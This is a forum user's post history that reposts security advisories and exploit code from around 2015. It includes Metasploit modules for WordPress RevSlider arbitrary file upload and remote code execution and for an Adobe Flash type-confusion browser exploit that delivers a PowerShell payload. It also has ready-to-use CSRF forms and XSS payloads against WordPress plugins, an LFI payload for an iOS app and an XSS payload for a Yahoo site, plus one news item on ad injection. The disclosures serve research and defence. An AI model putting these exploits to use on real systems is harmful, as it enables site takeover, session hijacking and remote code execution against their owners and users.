-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
================================================================ CSRF/Stored XSS Vulnerability in Ad Buttons Plugin ================================================================ . contents:: Table Of Content Overview ======== * Title :CSRF and Stored XSS Vulnerability in Ad Buttons Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ad-buttons/ * Severity: HIGH * Version Affected: Version 2.3.1 and mostly prior to it * Version Tested : Version 2.3.1 * version patched: Description =========== Vulnerable Parameter -------------------- * Your Ad Here' url About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin 1. Goto Dashboard --> Ad button --> Setting 2. Insert this payload ## ">><script>+-+-1-+-+alert(document.cookie)</script> ## Into above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Ad Button settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below CSRF POC Code ============= <html> <body> <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=ad-buttons-settings" method="POST"> <input type="hidden" name="ab_dspcnt" value="1" /> <input type="hidden" name="ab_title" value="" /> <input type="hidden" name="ab_target" value="bnk" /> <input type="hidden" name="ab_powered" value="1" /> <input type="hidden" name="ab_count" value="1" /> <input type="hidden" name="ab_yaht" value="pag" /> <input type="hidden" name="ab_yourad" value="44" /> <input type="hidden" name="ab_yahurl" value="">><script>+-+-1-+-+alert(6)</script>" /> <input type="hidden" name="ab_adsense_fixed" value="1" /> <input type="hidden" name="ab_adsense_pos" value="1" /> <input type="hidden" name="ab_adsense_pubid" value="pub-" /> <input type="hidden" name="ab_adsense_channel" value="" /> <input type="hidden" name="ab_adsense_corners" value="rc:0" /> <input type="hidden" name="ab_adsense_col_border" value="#" /> <input type="hidden" name="ab_adsense_col_title" value="#" /> <input type="hidden" name="ab_adsense_col_bg" value="#" /> <input type="hidden" name="ab_adsense_col_txt" value="#" /> <input type="hidden" name="ab_adsense_col_url" value="#" /> <input type="hidden" name="ab_width" value="<img" /> <input type="hidden" name="ab_padding" value="<img" /> <input type="hidden" name="Submit" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Plugin Closed Change Log ========== Plugin Closed Disclosure ========== 18-April-2015 Reported to Developer Plugin Closed 8-May-2015 Public credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh (at) me (dot) com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end Source
-
https://wordpress.org/plugins/yet-another-related-posts-plugin/ Affected Versions <= 4.2.4 Description 'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed javascript code which can lead to *code execution/administrator actions* when the injected code is triggered by an admin user. injected javascript code is triggered on any post page. Vulnerability Scope XSS RCE ( http://research.evex.pw/?vuln=14 ) Authorization Required None Proof of Concept <body onload="document.getElementById('payload_form').submit()" > <form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST" > <input type='hidden' name='recent_number' value='12' > <input type='hidden' name='recent_units' value='month' > <input type='hidden' name='threshold' value='5' > <input type='hidden' name='weight[title]' value='no' > <input type='hidden' name='weight[body]' value='no' > <input type='hidden' name='tax[category]' value='no' > <input type='hidden' name='tax[post_tag]' value='consider' > <input type='hidden' name='auto_display_post_types[post]' value='on' > <input type='hidden' name='auto_display_post_types[/page][page]' value='on' > <input type='hidden' name='auto_display_post_types[attachment]' value='on' > <input type='hidden' name='auto_display_archive' value='true' > <input type='hidden' name='limit' value='1' > <input type='hidden' name='use_template' value='builtin' > <input type='hidden' name='thumbnails_heading' value='Related posts:' > <input type='hidden' name='no_results' value='<script>alert(1);</script>' > <input type='hidden' name='before_related' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_related' value='</li>' > <input type='hidden' name='before_title' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_title' value='</li>' > <input type='hidden' name='show_excerpt' value='true' > <input type='hidden' name='excerpt_length' value='10' > <input type='hidden' name='before_post' value='+<small>' > <input type='hidden' name='after_post' value='</small>' > <input type='hidden' name='order' value='post_date ASC' > <input type='hidden' name='promote_yarpp' value='true' > <input type='hidden' name='rss_display' value='true' > <input type='hidden' name='rss_limit' value='1' > <input type='hidden' name='rss_use_template' value='builtin' > <input type='hidden' name='rss_thumbnails_heading' value='Related posts:' > <input type='hidden' name='rss_no_results' value='No Results' > <input type='hidden' name='rss_before_related' value='<li>' > <input type='hidden' name='rss_after_related' value='</li>' > <input type='hidden' name='rss_before_title' value='<li>' > <input type='hidden' name='rss_after_title' value='</li>' > <input type='hidden' name='rss_show_excerpt' value='true' > <input type='hidden' name='rss_excerpt_length' value='10' > <input type='hidden' name='rss_before_post' value='+<small>' > <input type='hidden' name='rss_after_post' value='</small>' > <input type='hidden' name='rss_order' value='score DESC' > <input type='hidden' name='rss_promote_yarpp' value='true' > <input type='hidden' name='update_yarpp' value='Save Changes' > </form></body> Fix No Fix Available at The Moment. Timeline Notified Vendor - No Reply Notified Vendor Again- No Reply Publish Disclosure @evex_1337 [url]http://research.evex.pw/?vuln=15[/url]Homepage Source
-
Google spam abuse researcher Kurt Thomas says some 84,000 injectors and apps are targeting its Chrome web browser with dodgy advertising. Thomas says the apps include 50,000 browser extensions and 34,000 applications which target Chrome to display revenue-generating ads within the sites that victims browse. About a third of these identified in the study Ad Injection at Scale: Assessing Deceptive Advertisement Modifications [PDF] by boffins at universities California, Berkeley, and Santa Barbara were "outright malicious", he says. "Upwards of 30 percent of these packages were outright malicious and simultaneously stole account credentials, hijacked search queries, and reported a user’s activity to third parties for tracking," Thomas says. "In total, we found 5.1 percent of page views on Windows and 3.4 percent of page views on Mac that showed tell-tale signs of ad injection software. "The ad injection ecosystem profits from more than 3000 victimised advertisers — including major retailers like Sears, Walmart, Target, Ebay — who unwittingly pay for traffic to their sites." Thomas says advertisers are blind to the injector process and see only the final ad click. University researchers found about 1000 profiteering affiliates who score commissions for injected ad clicks including Crossrider, Shopper Pro, and Netcrawl. Of the 25 businesses that provide the ads, Superfish and Jollywallet are "by far" the most popular accounting for 3.9 percent and 2.4 percent of Google views, respectively. The former ad injector became an internet pariah after users revealed it had been quietly foisted on Lenovo laptops. It has since been removed. But Choc Factory efforts are helping; Thomas says the number of warnings generated when users click on injected ads has fallen 95 percent since the company created warning flags last month and killed off 192 "deceptive" ad fiddling Chrome extensions. "This suggests it's become much more difficult for users to download unwanted software, and for bad advertisers to promote it," Thomas says. Google has also updated its ad policies to cut out the slimeballs and urges legitimate advertisers to do the same. Source
-
- advertisers
- chrome
-
(and 3 more)
Tagged with:
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player NetConnection Type Confusion', 'Description' => %q{ This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305. }, 'License' => MSF_LICENSE, 'Author' => [ 'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-0336'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'], ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'], ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 12 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @trigger = create_trigger super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) trigger_hex_stream = @trigger.unpack('H*')[0] html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_trigger path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source
-
Document Title: =============== Oracle Business Intelligence Mobile HD v11.x iOS - Persistent UI Vulnerability References (Source): ==================== http://vulnerability-lab.com/get_content.php?id=1361 Oracle Security ID: S0540289 Tracking ID: S0540289 Reporter ID: #1 2015Q1 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1361 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Oracle Business Intelligence Mobile HD brings new capabilities that allows users to make the most of their analytics information and leverage their existing investment in BI. Oracle Business Intelligence Mobile for Apple iPad is a mobile analytics app that allows you to view, analyze and act on Oracle Business Intelligence 11g content. Using Oracle Business Intelligence Mobile, you can view, analyze and act on all your analyses, dashboards, scorecards, reports, alerts and notifications on the go. Oracle Business Intelligence Mobile allows you to drill down reports, apply prompts to filter your data, view interactive formats on geo-spatial visualizations, view and interact with Dashboards, KPIs and Scorecards. You can save your analyses and Dashboards for offline viewing, and refresh them when online again; thus providing always-available access to the data you need. This app is compatible with Oracle Business Intelligence 11g, version 11.1.1.6.2BP1 and above. (Copy of the Vendor Homepage: http://www.oracle.com/technetwork/middleware/bi-foundation/bi-mobile-hd-1983913.html ) (Copy of the APP Homepage: https://itunes.apple.com/us/app/oracle-business-intelligence/id534035015 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side validation web vulnerability in the official Oracle Business Intelligence Mobile HD v11.1.1.7.0.2420 iOS web-application. Vulnerability Disclosure Timeline: ================================== 2014-10-27: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-11-01: Vendor Notification (Oracle Sec Alert Team - Acknowledgement Program) 2015-02-25: Vendor Response/Feedback (Oracle Sec Alert Team - Acknowledgement Program) 2015-04-15: Vendor Fix/Patch (Oracle Developer Team) 2015-05-01: Bug Bounty Reward (Oracle Sec Alert Team - CPU Bulletin Acknowledgement) 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Oracle Product: Business Intelligence Mobile HD 11.1.1.7.0.2420 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ The Vulnerability Laboratory Research Team discovered an application-side validation web vulnerability in the official Oracle Business Intelligence Mobile HD v11.1.1.7.0.2420 iOS web-application. The vulnerability is located in the input field of the dasboard file export name value of the local save (lokal speichern) function. After the injection of a system specific command to the input field of the dasboard name the attacker is able to use the email function. By clicking the email button the script code gets wrong encoded even if the attachment function is activated for pdf only. The wrong encoded input of the lokal save in the mimeAttachmentHeaderName (mimeAttachmentHeader) allows a local attacker to inject persistent system specific codes to compromise the integrity of the oracle ib email function. In case of the scenario the issue get first correct encoded on input and the reverse encoded inside allows to manipulate the mail context. Regular the function is in use to get the status notification mail with attached pdf or html file. For the tesings the pdf value was activated and without html. The security risk of the filter bypass and application-side input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent web vulnerability requires a low privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicous script codes or persistent web module context manipulation. Vulnerable Module(s): [+] Lokal speichern - Local save Vulnerable Parameter(s): [+] mimeAttachmentHeaderName (mimeAttachmentHeader) Affected Service(s): [+] Email - Local Dasboard File Proof of Concept (PoC): ======================= The application-side vulnerability can be exploited by local privilege application user accounts with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual reproduce of the vulnerability ... 1. Install the oracle business intelligence mobile hd ios app to your apple device (https://itunes.apple.com/us/app/oracle-business-intelligence/id534035015) 2. Register to your server service to get access to the client functions 2. Click the dashboard button to access 3. Now, we push top right in the navigation the local save (lokal speichern) button 4. Inject system specific payload with script code to the lokal save dashboard filename input field 5. Switch back to the app index and open the saved dashboard that as been saved locally with the payload (mimeAttachmentHeaderName) 6. Push in the top right navigation the email button 7. The mail client opens with the wrong encoded payload inside of the mail with the template of the dashboard 8. Successful reproduce of the security vulnerability! PoC: Email - Local Dasboard File <meta http-equiv="content-type" content="text/html; "> <div>"><[PERSISTENT INJECTED SCRIPT CODE!]"></x></div><div><br><br></div><br> <fieldset class="mimeAttachmentHeader"><legend class="mimeAttachmentHeaderName">"><"x">%20<[PERSISTENT INJECTED SCRIPT CODE!]>.html</legend></fieldset><br> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction and filter validation of the local dashboard file save module. Encode the input fields and parse the ouput next to reverse converting the context of the application through the mail function. The issue is not located in the apple device configuration because of the validation of the mimeAttachmentHeaderName in connection with the email function is broken. Security Risk: ============== The security risk of the application-side input validation web vulnerability in the oracle mobile application is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
-
- business
- intelligence
-
(and 3 more)
Tagged with:
-
Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1480 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. (Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== AppzCreative Ltd Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:52437/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software to your iOS device 2. Start the mobile ios software and activate the web-server 3. Open the wifi interface for file transfers 4. Start a session tamper and upload a random fil 5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload) 6. Save the input by processing to continue the request 7. The code executes in the main file dir index list of the local web-server (localhost:52437) 8. Open the link with the private folder and attach the file for successful exploitation with the path value 9. Successful reproduce of the vulnerability! PoC: Upload File (http://localhost:52437/Box/) <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div> --- PoC Session Logs [POST] (LFI - Filename) --- Status: 200[OK] POST http://localhost:52437/Box/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:52437] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:52437/Box/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------321711425710317 Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png" Content-Type: image/png Reference(s): http://localhost:52437/ http://localhost:52437/Box/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks. Security Risk: ============== The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
-
Document Title: =============== Yahoo eMarketing Bug Bounty #31 - Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1491 Yahoo Security ID (H1): #55395 Release Date: ============= 2015-05-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1491 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages. (Copy of the Vendor Homepage: http://www.yahoo.com ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the official Yahoo eMarketing online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-03: Vendor Notification (Yahoo Security Team - Bug Bounty Program) 2015-05-05: Vendor Response/Feedback (Yahoo Security Team - Bug Bounty Program) 2015-05-06: Vendor Fix/Patch (Yahoo Developer Team) 2015-05-06: Bug Bounty Reward (Yahoo Security Team - Bug Bounty Program) 2015-05-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non-persistent input validation web vulnerability has been discovered in the official Yahoo eMarketing online service web-application. The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user/admin session information. The vulnerability is located in the `id` value of the `eMarketing` module. Remote attackers are able to inject malicious script codes to client-side GET method application requests. Remote attackers are able to prepare special crafted web-links to execute client-side script code that compromises the yahoo user/admin session data. The execution of the script code occurs in same module context location by a mouse-over. The attack vector of the vulnerability is located on the client-side of the online service and the request method to inject or execute the code is GET. The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. Request Method(s): [+] GET Vulnerable Module(s): [+] Yahoo > eMarketing Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC Payload(s): "onmouseenter="confirm(document.domain) (https://marketing.tw.campaign.yahoo.net/) PoC: eMarketing ID <br/> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td align="right" width="10%" > <div class="fb-like" style="overflow: hidden; " data-href="http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id="onmouseenter="confirm(document.domain)" data-layout="button_count" data-action="recommend" data-show-faces="false" data-share="true"></div> </td> <td align="left" valign="bottom" width="65%" > <span style="font-size:12px; margin: 2px; font-weight:bold; color:#4d0079">?????????? ????????</span> </td> </tr> </table> --- PoC Session Logs [GET] --- Status: 200[OK] 